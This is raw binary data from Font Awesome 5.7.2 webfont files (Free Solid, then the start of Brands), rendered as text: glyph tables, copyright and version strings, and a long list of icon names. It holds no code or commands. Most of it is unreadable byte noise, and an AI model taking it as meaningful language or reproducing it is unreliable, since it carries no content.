�oB//B/fn)kp4H44H<
3
	30	
	

	
	,	

�
�(.$

(�/B//B�``����
 (<#>32#7"&547367#'547"&%2+'72+654&+'327ZR@(\gB6jK���b�P0
*q7OP/!F*#L#�D$,P2�K5

5w�0*=)�D(`�O7*!/`��$,2+"./&"+"&5463264&"264&"`

�

:
 �

e6%%6%e6%%6%�
��
	==
@
�%6%%6%%6%%6��
� A[72#"&'&6;232>'.+"&=4635"&=463!2676&#"+".7>#2&'&6;23264&+&'�%9:+#5
 
�				N !26(	:-06D
/+H
"
t�/$,A,"

		 	 	 	
	'(.G T7.
+'
(&���'"/&4?>7&?67'�M�5Z�N#L��zZzwL#N�Z5�M�^zZz���-W62"&4$2"&4'#"'"'#"'&7&47&66266+&'&#&""#"&5467&54632632:12((�((G2$2#�8(+	<	+(8%B. 5%!/(`((((2

2#$�P8
	
8(2

.B!/!	��B�8ER_l%#!"&5467<146326326#"&"'.'&'>32#"'&?>#"'&?>#"'&?>#"'&?>^%/!�!/%8(1,�+E+T:

%2�$	%
[$	%
[$	%
[$	%
�,!//!,(8(%5#+:P
5.�@@@@@@@@���+;J2#!"&5467&54632632:62"&546762#"&546762"&54>�(88(��(8%B. 5%!/��"("�"

"�"(@8P88(2

.B!/!	�232
32
 �����
)7Ec6#"'.?>#"'.?6&#"'.?6$#"'.?6&#"'.?672#!"&5467&54632632:�@	@m@	@�@	@�@	@S@	@;(88(��(8%B. 5%!/Q
p
p
p
p
p
p
p
p
p
p�8P88(2

.B!/!	����@�EP]jw�%#!"&5467<146326321&?'&4?'&6762760"1"&7&54632#"'&?>#"'&?>#"'&?>#"'&?>�%/!�!/$8(1"��;GGK##K	% Ib&D$	%
[$	%
[$	%
[$	%
�,!//!,(8(5K##KGGP&
�@@@@@@@@������1Jc|�%'.'!'+"/&?67&'.7676326&#/&""?65'76&#/&""?65'76&#/&""?65'5!+"&=#+"&}	

	��6&

	K	+*
Q�&C��
�
�
��`	@	�	@	�
		
	Nl#	c#
	+**Q$ 





퐐		PP		���
1U]emy2+"&54327.5>7327&'.5>7&'327&'.5>676.264&"6264&"264&"7264&"	 	,>&3=1S?AW3+O-%>&3=+O-%&.T,+O-.	5!6H+O-%&.T,1N.1(A( 4$)�							I						�
�0		�
��$
E	V>		
=	t!E		
�

	(			/	


9	


/	

���!)196"&4?6766264&"62"&42"&4�	 '-9�r9D�Z�jKKjKSI			�
aZ.@>9r�9BL �^KjKKjuM			��@�	5=RYf53+"&2+"/#".='0&5#".=46;2&"&462753"&5#"&'#"&?'46;#%2+"&5�@	 	 

:)
	
		&-Y((��

�
 @`
	 	0��		Q=
8
		8+e
		�`&-`((D �`


��
��
�0		�����M%2#"&?#".576;27+76'&+76&+"#"&5467&546;2654'632324X;
D|+/!


D0!/+
&!/	(8&p�	ax
	Ao.!/"x/!.&/!8(&��@�<Z6+"&=4&'&+"&=466+"&=4&'&+"&=466+"&=4&"+"&=46S�S	 	oSf�	 	�lW�	 	B19T	 	_N5 	 		 	+�K�Q�		�V�
�e�		�t�ZtV�		�3NM8�		�JrW0�		�

�		�#9����	";T�!546;26&/&"?6/76&/&"?6/76&/&"?6/2'.=#+"&=#+"&=!26=463 ��^B�B^��

�

�

�	)) 	`	�	`	 			@@B^^,





�	@'1 +p		PP		�p		@	����/G%2#!"&=4632+"&=463!2#!"&=463'"&4632632632+"'p		��		@		�		 		��		P<TT<=++=(D.BB.<%^%P				`								�TxT--*"B\B  ���/A2"&4264&""&54754622654'54&"7"&54675462xP88P8S� TxT B\B�B/ ( `(		�8P88PH�(2<TT<1)�.BB��/!(��(!N�		���/A2"&4264&""&54754622654'54&"7"&54675462xP88P8S� TxT B\B�B/ ( `(		�8P88PH�(2<TT<1)�.BB��/!(��(!N		����+;%2#!"&=46;#"3!2=4+5!4>3!2?6/&'&`

��

@

�

 ��	@
��J�_)�
`

`
@@@@	
�K^)��@�,X�%#&'"'"'"&=46767>7>7627#&'"'"'"&=46767>7>7627#&'"'"'"&=46767>7>7622+$)l+)l+)
!
X

Y
!+$)l+)l+#,
!
X

Y
!+$)l+)l+#,
!
X

Y
@	 
	 				�	 	 				�	 	 				������%="&462#"/&4?7#"'.?'6#5&/.>2?6�B//B/�


0	.=u.	0


�)�) )'b') /B//B��'
!
@9339@
!
' � 

 		���2:B!46762+"&547"'"&54>7&5!5463264&" 4&"2�o�0+!h		0<"/B/!F!/B/<�&��`��6`"
\	 	@K8+!//!
		
!//!!8K@&������B�
 go"&'62&.'632767632&7'&'&'&''&4767>.&76767&547632>54'&6264&" 	'V'	�%,5�4,$k6+`2+=66>+2`+6
)F2!7 )
�((P

��P/C**C/P� =	Xb	  bX= ?13H!8"0@�((��� 4I7&=46;22654.'&=467+"&5.'.=46+"&5.'".=46�:D
	<)Ej
0
(	0z�	 	�a	
Sv	 	S9
�d=)<	WD�

�
2��z
	a�	 	`vS
:R 
����	7!#!"&7;26=4&+"%2!546;546;23546;2���@	`		`	P�@0	 	�	 	���`		`		�000		00		0����	7!#!"&73!26=4&#!"%2!546;546;23546;2���@	 		��	P�@0	 	�	 	���@		@		�000		00		0�����")-15;C#"/&67%>'&#"#"/&6?63267'7'?'?'77&'67'�)6��
 a				!%,.O��=�<�<Q	-
$=d9w!�6�718>=��'''�.
	�	�����*'&&'&7276/>76/&67*."'f91��3
7S�DX!"&#b.&291B		
28 &"!XD
�����+;K[_o���%#!"&=4?>;5#"&=463!2+32;26=4&+"";26=4&#'#";26=4&'35#26=4&+"3;26=4&+"54+";2754&+";26754&+";26�	�@
U`				`��				 				0				���(				 				���				0				E[	
[�@	`		`	@				G				P				� �				@				�x				W				���+@V72/"/&4?'&637"&=46762#/&=46;26+"&?'&4?62�
c
c!�
c
c!cc
p��
p!c
c�
p!c
c@
p!c
c�c
c!p
p
c
c����B�C#'32%#73#5"&?6;2++"&=!+"&='#"&=46;'!0ac	��~�~��	c�			 	��	 			 �`������`�@	 	�				�	 	  ������	%?N^#53##7/32210'&/&"&?6;#+"&='#"&=46;'%"&54676>'&'&'32�=d�~!c
�'	c�51�	 			%4^�^D4('?3&X���H
>``� K7H6		�	 	 !`A]]A&m/$(�?/S!('1�32+5##5##5##5##"&=46;546;546;232�		P @ @ @ P		0	0	�	0		�	��������	�	0	0		0	0����7>Eeoy7#"&546;'&?6'&6?67>763253#"&53#2#5+#546;&54632632#3&#"7654&#"36�
	�


			  
		)��
�

��
( 7!!7 (�5	�	5��
`
	


	66

��`��`
 
`��`
,KK,
0		0������9=A%'&6?'#"&/#"'/&7>7.?>76767'7'�
'(??('
�'%WrrW%'��_$�p$_C	h.'KK'.h	C	fW(�
00
�(Wf	G'@..@'�����2#!".'&63!!�8��8���9���e@�����cs�2"&44&#"+;2=732;2?6;2;2=4?6=46;2+";2;6$;2?6=4&">7#"/&+'&+";2�Α�Α�uS(	

	% 

		 ��
	}5W
	
+ +	��Α��gSu	

	
		
			!�
	��8-
%

` %2#!"&=463%2#!"&=463�		� 		�		� 		�	 		 	�	 		 	 ����+"&546;2+"&546;2`	 		 	�	 		 	0		�		� 		�		�����)1"'.767>767>7&4?62264&"�		D
	7#mT#&K"6		D		��((�		D		6"K&#Tm#6

D		��((�����"/&6?>'7'6�$!��!$"b&`�0`"&a"v%i(��(i%#W@��@h#������@j"&4622462"&"&462&54'&>367>'&'&636762'&'.7676&'"'6'&5<546�((@(((((@	72		94�	27	
	49	((((`((�=3


:2
	�
1:
+3	

���/7%+"/#"&'.+"&=4>?6264&"�.	
3
./	7")�
%B0�
0%zt(	
@
 &R
Q?bU;K
6!8�����"'"/"/"'&63!2�WB.".,$W���,l����}��@�'08!>32#47%#534'3+#."#553#"&62#54@��'~J�`Bp?��B��
� 2:F:2���
�P8��~;E��C=�_��=C@`
 �##��``�8(``(������%2#!"&=463$!'&>76p		��		e(H��0@te
 	@		@	�"5W�:e@:����(:B&'&'&6;2+"7&'&'4>;2+"2++"&=463264&+#

n#
�.BB.8(�(8
p.#1,#1, B\B(88(�
�(`������$47'.'4>37'&6762&"2"&42&/65�&Q,6�Q7|7Q-((6,Q&�,� `8D�

� ((8` �,����%-5=7'&'&637&"'&67622&/65&2"&4264&"62"&4�*4
�$*"H"C
4*�Α�Α��ll�l��#C*B
6

C

y
B*C#��Α���l�ll�l ����)9V"&462"&462++"&=#"&?6727%2+"&5463++"&=#"&=4672�4&&4&Z4&&4&?7
0
7.8��		 		|

P

8@&4&&4&&4&&4��h

h��	� 		�	��
�

�
������7;?%"//"&46327'&67>7'&4?62762%7'7'�		a		P
k
l'Z(
Q		a		P0

/

0��EIE�IEI�		a		Q
(Z'l
k	Q		a		Q0

/

09EIE��IEI�����-B7.7>7&5462#"'+"&5.'.=46+"&5.'".=46�t9�b u
z�	 	�a	
Sv	 	S9
fta�9u
>�z
	a�	 	`vS
:R 
����
2#!"&575#35#35#@&&�&� 0�0�0�&��&&@��``````����
#*.52#!"&573535#"5#;5#75#326=!%54&+@&&�&� @�@ 
@@
�@�@ 
�
 �&��&&@��@@  @�@ 
@@  @M@@` 
@������(2O2"&42+"&46;264!6"/&627"&4?"&46;2"1"&='&6?|(()	`		`	��'DD
=\		0

�R=N�((�\				DD�	\	
�1S=Y

SN8�����$C"&462#"'%.>7'&776'&76776/&//'�((%�x			�.Kk(

1���#>R04	: s/`((���fEK5(#JFa 3		
9��@�.BN"&4622#!"&46;0&5&6?63232647'.?'&3737#"/d((�*� 

+6
(%,G*,
F
�U
%
'4>+�!
 =`((��
*
(5
�"Q2
.W
���

[�)N$	L����C%#!"&=463!2654/&?6%5"&46;2;26=32###5##5.e,��			



��

&"	/= &`

8(@�@*6a&'		


w�	,&@`(80004E�����6Wy2#"'#"&'&>7&542654/&54;2=4+"+"3754&+"'&+";2=2?;232654/&54;2=4+"+"3�Ԗ�j83AL9��	

	
0�z�z319JV�h		##		hD88D�����EQ"&462'76#"'%&'&>&'&6?54?'&/&>#"'&7�((TB4Z		��!&
J#*		?o
�<U�`((�?'f"�!			
5(:4S

--=

�����T\dlt�+"'.547&507'.?>54>;2167&5462704=46;276$264&"264&"6264&"6264&"7654&"6264&"��!	#%c
!&,�	8	
8P8
	8		
��			)																(7
"-.QC(?,
7	.!(88(".		*			��			7			7			O			2			����[`l62"&462"&462"&462"&4"/&=##!"&54>7546;546;2354?623'264&#!"3n^^^$
%)+B.�.B� O@)%
$��@zD:�H#%
$*:.BB.(	[p�
3:*$
% f S`@���((����2++"=#"=43%2#!"=43t�8�h�� 8��8�88����%19#+"&?.5475#"&=463!2;2=4+"264&"p /(�(/ 		`		��006tRRtR��2TGGT2�				������/9A%"/.7'#'76'"'&7>76'&"&4?264&"�5
uk>`@�k04
R*I%JDK
	�|5%�u45u0k�@`>k6R=+	KDJ$JR {%5�������)-15="&462232#!"&=46;5"#"'&67%65#%35+3"&462-��

��

�����``�``c�
<\
�

�
S;���`````` ����"&54676>'&'&'32D4H���_I9*
$:\K8+�0�+_��_6�D5: ��Y'	Cu ((8E����A�,X7'&67670767>767632%"#"/67>7>7>767�

5#$	
$7E #3

	%.&%
L	
$7E %C(

	%.
	 !5#p
!#
J$'

	%
%&!�
J6'/

	%&!!	!����2:%#!"&5463!2;;2=32=4+54+"#"5!"3�

��)77)F��808808��
Z	4
	7)@)7�088088��@��@�2##!"&5".546 AoH(#��	��2;�

	>k���	5!#!"&5!%630
�@
,Y{���

��Z�����A�,H3#!"&=26554+54+"#";;2=327#"/&"#"/&547%62 �	�`	;808808���M��		�D088088����

���02#"'#"547>7&5454+54+"#";;2=32�Ԗ�j83AL9`808808�z�z31:IVn088088�����%."/&4?627"/&4?6?7'76�
�7-nxf
fn-7
D
P	�
�7-nf
fxn-7{
D
	P����2"&546�b]2p�p2�u�7PppP7����'/7?%2#!"&4632#!"&=4637"&7>2#&"264&"264"264��`�	&��&	~�~>			�			�			�((�	&&	�42BB24p			)						 ����@%+"&/&=46?2=4>3762=463212=46�4�/
	


'$�S4J	L� �� 2	�#%!5467546;272#!"&=463�@B5)	`	)5B		� 		�@@;aRp		pRa�	 		 	�����AKU#"&5467>264&"2767>7>7>7>76'.?6&/�		��
"!/
`
!!(	
 ' ' 	
 ' ' �|�3��3�!
��
/!"
`	i
' ' 
' ' �3��3� ����2#!"&46;&5462'!"&p��TxT�cc ((<TT<��������%)A7"=4;54;232++"=%!463!2!2#!"&=46;;267�80880 ��@���	&�&	�
=�088088���P���`	&&	�#32#!"&54635#"3754&+326754&#!"3!26�&&��&&`P		�	PP	�
��

@
�&�&&&��0			0	�@

@
���1%3#"&4632>77'#5'6326'&54?632Kk%Kj�L!!1$5�6YK$(
�'"G@)!.!#+2-,&B9N"+
$7���&.6.'7>#"&5476264&"6264&"264&"�Z�b9R�]
3X�K��
rC{�	_�Y]�P9qJ�Vi
L�{����	7!+"&7;;26=326/&"72#!"&=46;76;25��E9	 	9Z�		�`		x	r	S���p		p^�	 		 	

����	7!#!"&7;;26=326/&"72#!"&=46;76;2 ���[9	 	9Z�		�`		x	r	P���p		p^�	 		 	

����7?N7"&547676=7+"'7;;2=32=4+54+"#"26=#!"&5467:	
��
R%^%,(/B/6K"��"K6_�	<$)1001)$<  �] !//! �N6""6N_V6���E%��
,p�
-g��	4	2Q	
�	>�	2	J_	,�	
X	.�	&�	
!	23	&�	
�Copyright (c) Font AwesomeCopyright (c) Font AwesomeFont Awesome 5 Free SolidFont Awesome 5 Free SolidSolidSolidFont Awesome 5 Free Solid-5.7.2Font Awesome 5 Free Solid-5.7.2Font Awesome 5 Free SolidFont Awesome 5 Free Solid329.474 (Font Awesome version: 5.7.2)329.474 (Font Awesome version: 5.7.2)FontAwesome5Free-SolidFontAwesome5Free-SolidThe web's most popular icon set and toolkit.The web's most popular icon set and toolkit.https://fontawesome.comhttps://fontawesome.comFont Awesome 5 FreeFont Awesome 5 FreeSolidSolidFont Awesome 5 Free SolidFont Awesome 5 Free SolidFont Awesome 5 FreeFont Awesome 5 FreeSolidSolid���	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTU�
VWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�����������������������������������������������������������������������������������"���������������������������������������������	

 !"#$%&'()�*+,-./0123456�#789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs��tuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@�ABCDEFGHIJ�KLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<�=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~���������������������������
glass-martinimusicsearchheartstaruserfilmth-largethth-listchecktimessearch-plussearch-minus	power-offsignalcoghomeclockroaddownloadinboxredosynclist-altlockflag
headphones
volume-offvolume-down	volume-upqrcodebarcodetagtagsbookbookmarkprintcamerafontbolditalictext-height
text-width
align-leftalign-centeralign-right
align-justifylistoutdentindentvideoimage
map-markeradjusttintedit
step-backward
fast-backwardbackwardplaypausestopforwardfast-forwardstep-forwardejectchevron-left
chevron-rightplus-circleminus-circletimes-circlecheck-circlequestion-circleinfo-circle
crosshairsban
arrow-leftarrow-rightarrow-up
arrow-downshareexpandcompressexclamation-circlegiftleaffireeye	eye-slashexclamation-triangleplanecalendar-altrandomcommentmagnet
chevron-upchevron-downretweet
shopping-cartfolderfolder-open	chart-barcamera-retrokeycogscomments	star-half	thumbtacktrophyuploadlemonphonephone-squareunlockcredit-cardrsshddbullhorncertificatehand-point-righthand-point-left
hand-point-uphand-point-downarrow-circle-leftarrow-circle-rightarrow-circle-uparrow-circle-downglobewrenchtasksfilter	briefcase
arrows-altuserslinkcloudflaskcutcopy	paperclipsavesquarebarslist-ullist-ol
strikethrough	underlinetablemagictruck
money-bill
caret-downcaret-up
caret-leftcaret-rightcolumnssort	sort-downsort-upenvelopeundogavelboltsitemapumbrellapaste	lightbulbuser-mdstethoscopesuitcasebellcoffeehospital	ambulancemedkitfighter-jetbeerh-squareplus-squareangle-double-leftangle-double-rightangle-double-upangle-double-down
angle-leftangle-rightangle-up
angle-downdesktoplaptoptabletmobile
quote-leftquote-rightspinnercirclesmilefrownmehgamepadkeyboardflag-checkeredterminalcode	reply-alllocation-arrowcropcode-branchunlinkinfoexclamationsuperscript	subscripteraserpuzzle-piece
microphonemicrophone-slashcalendarfire-extinguisherrocketchevron-circle-leftchevron-circle-rightchevron-circle-upchevron-circle-downanchor
unlock-altbullseye
ellipsis-h
ellipsis-v
rss-squareplay-circleminus-squarecheck-square
pen-squareshare-squarecompasscaret-square-downcaret-square-upcaret-square-right	euro-sign
pound-signdollar-sign
rupee-signyen-sign
ruble-signwon-signfilefile-altsort-alpha-down
sort-alpha-upsort-amount-downsort-amount-upsort-numeric-downsort-numeric-up	thumbs-upthumbs-downfemalemalesunmoonarchivebugcaret-square-left
dot-circle
wheelchair	lira-sign
space-shuttleenvelope-square
universitygraduation-caplanguagefaxbuildingchildpawcubecubesrecyclecartaxitreedatabasefile-pdf	file-word
file-excelfile-powerpoint
file-imagefile-archive
file-audio
file-video	file-code	life-ringcircle-notchpaper-planehistoryheading	sliders-h	share-altshare-alt-squarebombfutboltty
binocularsplug	newspaperwifi
calculator
bell-slashtrasheye-dropperpaint-brush
birthday-cake
chart-area	chart-pie
chart-line
toggle-off	toggle-onbicyclebusclosed-captioningshekel-sign	cart-pluscart-arrow-downshipuser-secret
motorcyclestreet-view	heartbeatvenusmarsmercurytransgendertransgender-altvenus-doublemars-double
venus-marsmars-stroke
mars-stroke-v
mars-stroke-hneuter
genderlessserver	user-plus
user-timesbedtrainsubwaybattery-fullbattery-three-quartersbattery-halfbattery-quarter
battery-empty
mouse-pointeri-cursorobject-groupobject-ungroupsticky-noteclone
balance-scalehourglass-starthourglass-half
hourglass-end	hourglass	hand-rock
hand-paper
hand-scissorshand-lizard
hand-spockhand-pointer
hand-peacetv
calendar-pluscalendar-minuscalendar-timescalendar-checkindustrymap-pin	map-signsmapcomment-altpause-circlestop-circleshopping-bagshopping-baskethashtaguniversal-accessblindaudio-descriptionphone-volumebrailleassistive-listening-systems#american-sign-language-interpretingdeaf
sign-language
low-vision	handshake
envelope-openaddress-bookaddress-carduser-circleid-badgeid-cardthermometer-fullthermometer-three-quartersthermometer-halfthermometer-quarterthermometer-emptyshowerbathpodcastwindow-maximizewindow-minimizewindow-restore	microchip	snowflake
utensil-spoonutensilsundo-alt	trash-altsync-alt	stopwatchsign-out-altsign-in-altredo-altpooimages
pencil-altpenpen-altlong-arrow-alt-downlong-arrow-alt-leftlong-arrow-alt-rightlong-arrow-alt-upexpand-arrows-alt	clipboardarrows-alt-harrows-alt-varrow-alt-circle-downarrow-alt-circle-leftarrow-alt-circle-rightarrow-alt-circle-upexternal-link-altexternal-link-square-altexchange-altcloud-download-altcloud-upload-altgemlevel-down-altlevel-up-alt	lock-openmap-marker-altmicrophone-alt
mobile-altmoney-bill-altphone-slashportraitreply
shield-alt
tablet-alttachometer-alt
ticket-altuser-altwindow-close
baseball-ballbasketball-ballbowling-ballchesschess-bishopchess-board
chess-kingchess-knight
chess-pawnchess-queen
chess-rookdumbbell
football-ball	golf-ballhockey-puck	quidditchsquare-fulltable-tennisvolleyball-ball	allergiesband-aidboxboxesbriefcase-medicalburncapsulesclipboard-checkclipboard-list	diagnosesdnadolly
dolly-flatbedfile-medicalfile-medical-alt	first-aidhospital-althospital-symbolid-card-alt
notes-medicalpalletpillsprescription-bottleprescription-bottle-alt
procedures
shipping-fastsmokingsyringetabletsthermometervialvials	warehouseweightx-raybox-opencomment-dots
comment-slashcouchdonatedovehand-holdinghand-holding-hearthand-holding-usdhands
hands-helping
parachute-boxpeople-carry
piggy-bankribbonrouteseedlingsign
smile-winktape
truck-loadingtruck-movingvideo-slash
wine-glassuser-alt-slashuser-astronaut
user-check
user-clockuser-cog	user-edituser-friends
user-graduate	user-lock
user-minus
user-ninjauser-shield
user-slashuser-taguser-tie	users-cogblender	book-openbroadcast-towerbroom
chalkboardchalkboard-teacherchurchcoinscompact-disccrowcrowndice	dice-five	dice-fourdice-onedice-six
dice-threedice-twodoor-closed	door-openequalsfeatherfroggas-pumpglassesgreater-thangreater-than-equal
helicopter	kiwi-bird	less-thanless-than-equalmemorymicrophone-alt-slashmoney-bill-wavemoney-bill-wave-altmoney-checkmoney-check-alt	not-equalpaletteparking
percentageproject-diagramreceiptrobotrulerruler-combinedruler-horizontalruler-verticalschoolscrewdrivershoe-printsskullsmoking-banstore	store-altstreamstroopwafeltoolboxtshirtwalkingwalletangryarchwayatlasaward	backspacebezier-curvebongbrushbus-altcannabischeck-doublecocktailconcierge-bellcookiecookie-bitecrop-altdigital-tachographdizzydrafting-compassdrum
drum-steelpanfeather-alt
file-contract
file-downloadfile-exportfile-importfile-invoicefile-invoice-dollarfile-prescriptionfile-signaturefile-uploadfill	fill-dripfingerprintfishflushed
frown-openglass-martini-altglobe-africaglobe-americas
globe-asiagrimacegringrin-alt	grin-beamgrin-beam-sweatgrin-heartsgrin-squintgrin-squint-tears
grin-stars
grin-tearsgrin-tonguegrin-tongue-squintgrin-tongue-wink	grin-winkgrip-horizontal
grip-verticalheadphones-altheadsethighlighterhot-tubhoteljointkiss	kiss-beamkiss-wink-heartlaugh
laugh-beamlaugh-squint
laugh-winkluggage-cart
map-markedmap-marked-altmarkermedal	meh-blankmeh-rolling-eyesmonument
mortar-pestlepaint-rollerpassport	pen-fancypen-nibpencil-ruler
plane-arrivalplane-departureprescriptionsad-crysad-tearshuttle-van	signature
smile-beamsolar-panelspasplotch	spray-canstamp
star-half-altsuitcase-rollingsurprise
swatchbookswimmer
swimming-pool
tint-slashtiredtoothumbrella-beach
vector-squareweight-hangingwine-glass-alt
air-freshener	apple-altatombonebook-readerbraincar-altcar-battery	car-crashcar-sidecharging-station
directionsdraw-polygonlaptop-codelayer-group
microscopeoil-canpoopshapesstar-of-lifeteeth
teeth-open
theater-masks
traffic-light
truck-monstertruck-pickupadankhbible
business-timecitycomment-dollarcomments-dollarcrossdharmachakraenvelope-open-textfolder-minusfolder-plus
funnel-dollargopuramhamsahaykaljedijournal-whillskaabakhandalandmark	mail-bulkmenorahmosqueompastafarianismpeaceplace-of-worshippollpoll-hpray
praying-handsquran
search-dollarsearch-locationsockssquare-root-altstar-and-crescent
star-of-david	synagoguetorah
torii-gateviharavolume-muteyin-yang
blender-phone	book-dead
campgroundcatchair
cloud-moon	cloud-sundice-d20dice-d6dogdragondrumstick-bitedungeonfile-csvfist-raisedghosthammerhanukiah
hat-wizardhikinghippohorsehouse-damagehryvniamaskmountain
network-wiredotterrunningscrollskull-crossbonesspidertoilet-papertractoruser-injuredvr-cardboardwindwine-bottlecloud-meatballcloud-moon-rain
cloud-raincloud-showers-heavycloud-sun-raindemocratflag-usameteorperson-booth	poo-stormrainbow
republicansmogtemperature-hightemperature-lowvote-yeawaterbaby
baby-carriage	biohazardblogcalendar-day
calendar-week
candy-canecarrot
cash-registercompress-arrows-altdumpster
dumpster-fireethernetgiftsglass-cheers
glass-whiskeyglobe-europe
grip-linesgrip-lines-verticalguitarheart-brokenholly-berry
horse-headiciclesigloomittenmug-hot	radiation
radiation-altrestroom	satellitesatellite-dishsd-cardsim-cardskatingskiing
skiing-nordicsleighsmssnowboardingsnowmansnowplowtengetoilettoolstramfire-altbaconbook-medicalbread-slicecheeseclinic-medicalcomment-medicalcrutchegg	hamburgerhand-middle-fingerhard-hathotdog	ice-creamlaptop-medicalpager
pepper-hotpizza-slice
trash-restoretrash-restore-alt
user-nurse����`)l؈��؈��PK!�b=����&fontawesome/webfonts/fa-brands-400.eotnu&1i���X��LP�	�K�:Font Awesome 5 Brands RegularRegularJ329.474 (Font Awesome version: 5.7.2):Font Awesome 5 Brands Regular
�PFFTM�qq�<GDEF*��OS/2B�/X`cmap��<jgasp���glyf��p���$head���6hhea5�$hmtx�}��loca�.<
�Dmaxp
O8 name�uu"�post��Ԑ�IyX�K�	_<�؈��؈��������������L'@��LfGLf��PfEd������.�T�:� �����������������@���������?�x�� �	�p��?������������@� �@����@�?
�����@
�
}����@@@@@@���.�@
��@��������@���@@�	@��@��������������������� @������� ������������
�?���������������������@��������������Mg����?�������������������P��` ����������������������@ ������@��?���@������������F�������������@�������������@���@���������������q�j�c@@�������@y�������������������E���
����������������c������#�������Y����:������������U�����������w���w
�dH����������6�<�Z�i�n�q�t�~���������������������	���2�7�>�L�^�k�n�p�~�����������������\�u�}�����������������������������������
�!�#�1�M�R�W�Y����������������������������?�B���������1�]�x�{��������������������������������6�;�Z�g�k�p�s�y�����������������������
��1�7�:�K�^�`�m�p�|�����������������\�h�x�������������������������������������#�%�M�R�W�Y������
�����������������������?�B���������0�]�x�z�����������������������ytn8-�������������������zwhedXTQP620$
�
�
�
�
�
�
�
�
�
�
R
G
E
D
B
@
>
=
<
:
9
8
7
5
3
2
1
.
-
+
*
)
(
%
$
 




����xjiY�������������lj><
�
�
�
�
�
�
V
+




	�	�	�	�	�	�	�	�	�	�Z���� �N�H��@`�J������H���	vN�"~��
d
�2��*�"P~�(�D��0H�`�|�Npl���B�6\��j���.�!>!�$$�%�&&�&�'�'�))6)|)�*R+p+�,&,~,�--V-v00Z0�1d1�22B2z323�44B4�5L5�6�77|7�8�9$989v9�9�:z:�:�;;�<<@<�==X=z=�=�>P>�?*?�@@�A$A�BRB�C(CzD�D�E>E�FBGG6GPHXH�IFI�J~J�J�L(L�MMzN\N�N�O^P�P�QnRNR�R�SDTZT�U6U�VV�WWnW�W�X*X�Y�Y�Z\f\�]T]�^^B^d^�_4_�_�aaLana�a�b4dd\eeDe�ff4f`f�i�j�kk�ll^l�m2o�pxp�q(q�r*r^r�s�s�tt�t�ufu�u�u�vv�w<wrw�x�yfy�zzlz�|@|�|�}j}�~(~�~�v�������ЁR����j����̄��2�R�����2�����抐���V�،�����b���P�֑Z����ܕf�������>�~�������@�p���<�؝��P�����d� �Z�ܡ��$�f�ȣ4������b������L���������������B�n������j��\�(�l�*���ʻ�B����x�코�Ⱦ(�T���п����z�:���Vʮ�0���jό�R�nҐ���0���2Ԭ���lֆּ�$ט��<�\ۊ���ܺ�2���6�����;2#!"&54636767&#"&'&''3#"'32>54���/(S5	"$-	.79X)���`�
0!@
$:T-����%+537#54>;5&#"#3#"&5463!2�U<	E
$(/==�`p���D+
	</*2D�`����52#!"&546335#6264&"54.#"#5#354632�

��

gC  @!!@C�
��

�
�������u"�j
h	����V[cipw}�2#!"&5463>54&#"54&5".'&'0'43767.547&7662>&&364#"32&'&6'6&'6'&&6'&'6'"����2=aEE]>2	 	
	+
S
	���`��W7D]]D7W
 
		
	)
@	���0#"'327"&'327.=&547&546326767�(ItFXII:#5

	&/'q@=+.$"(	5iW6/-)+
 81:+>!%
 ����%+537#54>;5&#"#3#"&5463!2�r:	C
$'0::��
��r
�C+
	=.+2C������emu}�7#54366'72&2&5<54'>54&'6'&&".&'./"2?'.5466'&'6'&6'&'6&�!(GDtC]K	$
"
A%	"

 
	L^�,	"	3�@pDS�? (%
			%!(
0�Sh���
!	����J#"'6?32654&#"7>76'&54632#"&7>54.#".5462�g&# 7IXALW=3.:$
GW��'Α(;YA=RX>9
"+A9,!4
$
		"	g.~Ng�����R+6?32>54&#"74676'&54632#"&7>54'&#"&5463!2�� %:!WAKW=2-:#
Y`p��$;(F*=QW>8!+@8, 4#		7 
`����+72#!"&54632654'#3#".546327&#"%5#5##335���t+5^9$');;���`��6,"%;R;Rt�'%#"&4632&#"3267#53##5#5353�fRPppPK54. 7 F126mn888778�Sip�p22 8!2G6C88888��%3#3&"&462#54.#"#33>32d]],  , T]	!]Z
. "-	+) ,  ,���
*#�+))0!��
3LT6#".5462#*.'&547&5472632>34&#""'&#";2>&2"&4�#9	) 76-*#1*/*&1"'@(",0+
"(*&00/d##�&$$;$	(7A0
	.w#00#&
+V$&$$&
{%#76&+###'!2�a41<a;S<a<-t>$%
�����`--=����!'7#3/#3?#'�#����56/ca���t440�>&L�1����'73?!7!7!7�@�Rt���M�����PP_),,aR5R����.AT%#5"##5"#723>75."#57536353'262>54.2>54.#6MGB1
1	X

T
1
1 
�
	
! �R5,DCCD:�4ONMO:T`
	�	


2�$'#"'&'.'547>7>7327'&j,,�*'
j,,�*�Ǐ�D$#
	Z+%CY+�RQ������#70+"&?'&6;2%+"/>76;2�F
AE,A	�[B\H)
B�|	zL	V��	�6H	���� 12#!"&54632767'&+"3%6&+";26/���\0 .1
/fB/B���`��	U7	6W�	�x	w���'7'7757'7�����������������LUTTUTTT��UUT�TTTTUTT��~�%'?'7'?'#553!53#	���z��w w4��(��(�')'.��$T%�����((Px��x������3k2"&4264&"6"&462"'&'.5&47676762><.'&'.*#*:3:>76�`CC`CT>,,>,�\C=�=!
!!=�=C-#)(#
#)'#3C`CC`{,>,,>�6�=C! �<!"C��#('##)
����2#!"&5463264&"264&"���F5%%5%�5%%5%���`��%5%%5%%5%%5����
#$"&462'373�A�9�Α��-��"�"bqΑ�Α����44����!23'!".'45467#�D��D
$���_�	�ד���:�)#".=#"=47>76;232+7665!*>
/
*(F
T

T#!	 
.,�
DB%
s
R
�@
����72#!"&54636/&'&&=32=4+54+";32���44,	1&*���`��(
S4H
8+Z��y�&%"&#"#.'&54672326''&7>7;=: ./1E.8@938 %&�?&P26*'?F(n&( (����7#53537#�������b�������"� ����$;DP_7"&=463253+&=#&=#"&7#4>7'&7676&4&"3264&#"322#"&=46Z
�&��66"�	we
	�tt���====�#$$#52
tt
	����k~���
